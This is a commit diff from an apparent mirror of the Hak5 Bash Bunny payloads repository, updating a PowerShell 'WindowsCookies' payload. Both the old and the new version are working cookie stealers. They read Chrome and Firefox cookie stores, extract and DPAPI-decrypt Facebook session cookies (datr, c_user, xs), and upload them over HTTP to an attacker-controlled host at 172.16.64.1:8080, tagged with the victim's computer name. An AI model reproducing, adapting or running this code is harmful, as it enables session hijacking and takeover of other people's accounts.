mirror of
https://github.com/hak5/bashbunny-payloads.git
synced 2025-10-29 16:58:25 +00:00
Updated WindowsCookie for firmware v1.1 and fix powershell regex for Windows 7 (#161)
This commit is contained in:
Ben
242
payloads/library/WindowsCookies/p
Normal file → Executable file
242
payloads/library/WindowsCookies/p
Normal file → Executable file
@@ -1,118 +1,124 @@
|
||||
# Instructions: import the module, then perform the commanded needed.
|
||||
|
||||
# Chrome Facebook cookies extraction
|
||||
# Use: Get-FacebookCreds [path to Login Data]
|
||||
# Path is optional, use if automatic search doesn't work
|
||||
|
||||
function Get-FacebookCreds-Firefox() {
|
||||
Param(
|
||||
[String]$Path
|
||||
)
|
||||
|
||||
if ([String]::IsNullOrEmpty($Path)) {
|
||||
# $Path = "$env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\Cookies"
|
||||
$path = Get-ChildItem "$env:USERPROFILE\AppData\Roaming\Mozilla\Firefox\Profiles\*.default\cookies.sqlite"
|
||||
}
|
||||
|
||||
if (![system.io.file]::Exists($Path))
|
||||
{
|
||||
Write-Error 'Chrome db file doesnt exist, or invalid file path specified.'
|
||||
Break
|
||||
}
|
||||
|
||||
Add-Type -AssemblyName System.Security
|
||||
# Credit to Matt Graber for his technique on using regular expressions to search for binary data
|
||||
$Stream = New-Object IO.FileStream -ArgumentList "$Path", 'Open', 'Read', 'ReadWrite'
|
||||
$Encoding = [system.Text.Encoding]::GetEncoding(28591)
|
||||
$StreamReader = New-Object IO.StreamReader -ArgumentList $Stream, $Encoding
|
||||
$BinaryText = $StreamReader.ReadToEnd()
|
||||
$StreamReader.Close()
|
||||
$Stream.Close()
|
||||
|
||||
# First the magic bytes for the facebook string, datr size is 24
|
||||
$PwdRegex = [Regex] '\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x64\x61\x74\x72([\s\S]{24})'
|
||||
$PwdMatches = $PwdRegex.Matches($BinaryText)
|
||||
$datr = $PwdMatches.groups[1]
|
||||
|
||||
# First the magic bytes for the facebook string, c_user size is 15
|
||||
$PwdRegex = [Regex] '\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x63\x5F\x75\x73\x65\x72([\s\S]{15})'
|
||||
$PwdMatches = $PwdRegex.Matches($BinaryText)
|
||||
$c_user = $PwdMatches.groups[1]
|
||||
|
||||
# First the magic bytes for the facebook string, xs size is 44
|
||||
$PwdRegex = [Regex] '\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x78\x73([\s\S]{44})'
|
||||
$PwdMatches = $PwdRegex.Matches($BinaryText)
|
||||
$xs = $PwdMatches.groups[1]
|
||||
|
||||
"$env:computername ---> "
|
||||
"datr is $datr ###"
|
||||
"c_user is $c_user ###"
|
||||
"xs is $xs ###"
|
||||
}
|
||||
|
||||
function Get-FacebookCreds-Chrome() {
|
||||
Param(
|
||||
[String]$Path
|
||||
)
|
||||
|
||||
if ([String]::IsNullOrEmpty($Path)) {
|
||||
$Path = "$env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\Cookies"
|
||||
}
|
||||
|
||||
if (![system.io.file]::Exists($Path))
|
||||
{
|
||||
Write-Error 'Chrome db file doesnt exist, or invalid file path specified.'
|
||||
Break
|
||||
}
|
||||
|
||||
Add-Type -AssemblyName System.Security
|
||||
# Credit to Matt Graber for his technique on using regular expressions to search for binary data
|
||||
$Stream = New-Object IO.FileStream -ArgumentList "$Path", 'Open', 'Read', 'ReadWrite'
|
||||
$Encoding = [system.Text.Encoding]::GetEncoding(28591)
|
||||
$StreamReader = New-Object IO.StreamReader -ArgumentList $Stream, $Encoding
|
||||
$BinaryText = $StreamReader.ReadToEnd()
|
||||
$StreamReader.Close()
|
||||
$Stream.Close()
|
||||
|
||||
# First the magic bytes for the facebook string, datr size is 242 + 4 and hex is \x64\x61\x74\x72
|
||||
$PwdRegex = [Regex] '\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D(\x64\x61\x74\x72)\x2F[\s\S]*?(\x01\x00\x00\x00[\s\S]{242})'
|
||||
$PwdMatches = $PwdRegex.Matches($BinaryText)
|
||||
|
||||
# [System.BitConverter]::ToString($Encoding.GetBytes($PwdMatches.groups[2]));
|
||||
$Pwd = $Encoding.GetBytes($PwdMatches.groups[2])
|
||||
$Decrypt = [System.Security.Cryptography.ProtectedData]::Unprotect($Pwd,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser)
|
||||
$datr = [System.Text.Encoding]::Default.GetString($Decrypt)
|
||||
|
||||
|
||||
# First the magic bytes for the facebook string, c_user size is 226 + 4 and hex is \x63\x5F\x75\x73\x65\x72
|
||||
$PwdRegex = [Regex] '\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D(\x63\x5F\x75\x73\x65\x72)\x2F[\s\S]*?(\x01\x00\x00\x00[\s\S]{226})'
|
||||
$PwdMatches = $PwdRegex.Matches($BinaryText)
|
||||
|
||||
# [System.BitConverter]::ToString($Encoding.GetBytes($PwdMatches.groups[2]));
|
||||
$Pwd = $Encoding.GetBytes($PwdMatches.groups[2])
|
||||
$Decrypt = [System.Security.Cryptography.ProtectedData]::Unprotect($Pwd,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser)
|
||||
$c_user = [System.Text.Encoding]::Default.GetString($Decrypt)
|
||||
|
||||
|
||||
# First the magic bytes for the facebook string, xs size is 258 + 4 and hex is \x78\x73
|
||||
$PwdRegex = [Regex] '\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D(\x78\x73)\x2F[\s\S]*?(\x01\x00\x00\x00[\s\S]{258})'
|
||||
$PwdMatches = $PwdRegex.Matches($BinaryText)
|
||||
|
||||
# [System.BitConverter]::ToString($Encoding.GetBytes($PwdMatches.groups[2]));
|
||||
$Pwd = $Encoding.GetBytes($PwdMatches.groups[2])
|
||||
$Decrypt = [System.Security.Cryptography.ProtectedData]::Unprotect($Pwd,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser)
|
||||
$xs = [System.Text.Encoding]::Default.GetString($Decrypt)
|
||||
|
||||
"$env:computername ---> "
|
||||
"datr is $datr ###"
|
||||
"c_user is $c_user ###"
|
||||
"xs is $xs ###"
|
||||
}
|
||||
|
||||
|
||||
function Payload() {
|
||||
|
||||
Invoke-Expression (New-Object Net.WebClient).UploadString('http://172.16.64.1:8080/l', $(Get-FacebookCreds-Chrome))
|
||||
Invoke-Expression (New-Object Net.WebClient).UploadString('http://172.16.64.1:8080/l', $(Get-FacebookCreds-Firefox))
|
||||
|
||||
}
|
||||
# Instructions: import the module, then perform the commanded needed.
|
||||
|
||||
# Chrome Facebook cookies extraction
|
||||
# Use: Get-FacebookCreds [path to Login Data]
|
||||
# Path is optional, use if automatic search doesn't work
|
||||
|
||||
function Get-FacebookCreds-Firefox() {
|
||||
Param(
|
||||
[String]$Path
|
||||
)
|
||||
|
||||
if ([String]::IsNullOrEmpty($Path)) {
|
||||
# $Path = "$env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\Cookies"
|
||||
$path = Get-ChildItem "$env:USERPROFILE\AppData\Roaming\Mozilla\Firefox\Profiles\*.default\cookies.sqlite"
|
||||
}
|
||||
|
||||
if (![system.io.file]::Exists($Path))
|
||||
{
|
||||
Write-Error 'Chrome db file doesnt exist, or invalid file path specified.'
|
||||
Break
|
||||
}
|
||||
|
||||
Add-Type -AssemblyName System.Security
|
||||
# Credit to Matt Graber for his technique on using regular expressions to search for binary data
|
||||
$Stream = New-Object IO.FileStream -ArgumentList "$Path", 'Open', 'Read', 'ReadWrite'
|
||||
$Encoding = [system.Text.Encoding]::GetEncoding(28591)
|
||||
$StreamReader = New-Object IO.StreamReader -ArgumentList $Stream, $Encoding
|
||||
$BinaryText = $StreamReader.ReadToEnd()
|
||||
$StreamReader.Close()
|
||||
$Stream.Close()
|
||||
|
||||
# First the magic bytes for the facebook string, datr size is 24
|
||||
$PwdRegex = [Regex] '\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x64\x61\x74\x72([\s\S]{24})'
|
||||
$PwdMatches = $PwdRegex.Matches($BinaryText)
|
||||
$datr = $PwdMatches | ForEach-Object { $_.Groups[1].Value }
|
||||
# $datr = $PwdMatches.groups[1]
|
||||
|
||||
# First the magic bytes for the facebook string, c_user size is 15
|
||||
$PwdRegex = [Regex] '\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x63\x5F\x75\x73\x65\x72([\s\S]{15})'
|
||||
$PwdMatches = $PwdRegex.Matches($BinaryText)
|
||||
$c_user = $PwdMatches | ForEach-Object { $_.Groups[1].Value }
|
||||
# $c_user = $PwdMatches.groups[1]
|
||||
|
||||
# First the magic bytes for the facebook string, xs size is 44
|
||||
$PwdRegex = [Regex] '\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x78\x73([\s\S]{44})'
|
||||
$PwdMatches = $PwdRegex.Matches($BinaryText)
|
||||
$xs = $PwdMatches | ForEach-Object { $_.Groups[1].Value }
|
||||
# $xs = $PwdMatches.groups[1]
|
||||
|
||||
"Firefox ---> "
|
||||
"datr is $datr ###"
|
||||
"c_user is $c_user ###"
|
||||
"xs is $xs ###"
|
||||
}
|
||||
|
||||
function Get-FacebookCreds-Chrome() {
|
||||
Param(
|
||||
[String]$Path
|
||||
)
|
||||
|
||||
if ([String]::IsNullOrEmpty($Path)) {
|
||||
$Path = "$env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\Cookies"
|
||||
}
|
||||
|
||||
if (![system.io.file]::Exists($Path))
|
||||
{
|
||||
Write-Error 'Chrome db file doesnt exist, or invalid file path specified.'
|
||||
Break
|
||||
}
|
||||
|
||||
Add-Type -AssemblyName System.Security
|
||||
# Credit to Matt Graber for his technique on using regular expressions to search for binary data
|
||||
$Stream = New-Object IO.FileStream -ArgumentList "$Path", 'Open', 'Read', 'ReadWrite'
|
||||
$Encoding = [system.Text.Encoding]::GetEncoding(28591)
|
||||
$StreamReader = New-Object IO.StreamReader -ArgumentList $Stream, $Encoding
|
||||
$BinaryText = $StreamReader.ReadToEnd()
|
||||
$StreamReader.Close()
|
||||
$Stream.Close()
|
||||
|
||||
# First the magic bytes for the facebook string, datr size is 242 + 4 and hex is \x64\x61\x74\x72
|
||||
$PwdRegex = [Regex] '\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D(\x64\x61\x74\x72)\x2F[\s\S]*?(\x01\x00\x00\x00[\s\S]{242})'
|
||||
$PwdMatches = $PwdRegex.Matches($BinaryText)
|
||||
|
||||
# [System.BitConverter]::ToString($Encoding.GetBytes($PwdMatches.groups[2]));
|
||||
$Pwd = $Encoding.GetBytes(($PwdMatches | ForEach-Object { $_.Groups[2].Value }))
|
||||
# $Pwd = $Encoding.GetBytes($PwdMatches.groups[2])
|
||||
$Decrypt = [System.Security.Cryptography.ProtectedData]::Unprotect($Pwd,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser)
|
||||
$datr = [System.Text.Encoding]::Default.GetString($Decrypt)
|
||||
|
||||
|
||||
# First the magic bytes for the facebook string, c_user size is 226 + 4 and hex is \x63\x5F\x75\x73\x65\x72
|
||||
$PwdRegex = [Regex] '\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D(\x63\x5F\x75\x73\x65\x72)\x2F[\s\S]*?(\x01\x00\x00\x00[\s\S]{226})'
|
||||
$PwdMatches = $PwdRegex.Matches($BinaryText)
|
||||
|
||||
# [System.BitConverter]::ToString($Encoding.GetBytes($PwdMatches.groups[2]));
|
||||
$Pwd = $Encoding.GetBytes(($PwdMatches | ForEach-Object { $_.Groups[2].Value }))
|
||||
# $Pwd = $Encoding.GetBytes($PwdMatches.groups[2])
|
||||
$Decrypt = [System.Security.Cryptography.ProtectedData]::Unprotect($Pwd,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser)
|
||||
$c_user = [System.Text.Encoding]::Default.GetString($Decrypt)
|
||||
|
||||
|
||||
# First the magic bytes for the facebook string, xs size is 258 + 4 and hex is \x78\x73
|
||||
$PwdRegex = [Regex] '\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D(\x78\x73)\x2F[\s\S]*?(\x01\x00\x00\x00[\s\S]{258})'
|
||||
$PwdMatches = $PwdRegex.Matches($BinaryText)
|
||||
|
||||
# [System.BitConverter]::ToString($Encoding.GetBytes($PwdMatches.groups[2]));
|
||||
$Pwd = $Encoding.GetBytes(($PwdMatches | ForEach-Object { $_.Groups[2].Value }))
|
||||
# $Pwd = $Encoding.GetBytes($PwdMatches.groups[2])
|
||||
$Decrypt = [System.Security.Cryptography.ProtectedData]::Unprotect($Pwd,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser)
|
||||
$xs = [System.Text.Encoding]::Default.GetString($Decrypt)
|
||||
|
||||
"Chrome ---> "
|
||||
"datr is $datr ###"
|
||||
"c_user is $c_user ###"
|
||||
"xs is $xs ###"
|
||||
}
|
||||
|
||||
|
||||
function Payload() {
|
||||
|
||||
Invoke-Expression (New-Object Net.WebClient).UploadString("http://172.16.64.1:8080/$env:computername", $(Get-FacebookCreds-Chrome))
|
||||
Invoke-Expression (New-Object Net.WebClient).UploadString("http://172.16.64.1:8080/$env:computername", $(Get-FacebookCreds-Firefox))
|
||||
|
||||
}
|
||||
Reference in New Issue
Block a user